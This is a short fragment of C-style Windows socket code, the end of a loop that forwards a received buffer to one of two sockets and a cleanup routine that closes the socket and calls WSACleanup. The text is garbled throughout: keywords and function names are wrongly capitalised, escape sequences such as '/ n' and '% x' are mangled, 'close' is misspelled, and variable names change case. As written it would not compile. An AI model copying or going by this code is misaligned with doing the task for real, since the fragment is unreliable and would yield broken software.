Printf ("/ n fd3 colse.");
Break;
}
While (j == 1 && k == 0) OpenSockFD4 (Argc, Argv);
IF (i> 0) {
IF (j == 0) Send (FD2, BUFF, I, 0);
Else {
Printf ("/ N Send FD4 0x% x Packet", BUFF [0x8]);
Send (FD4, BUFF, I, 0);
}
}
}
}
}
void out ()
{
CloseSocket (FD);
WSACLEANUP ();
}
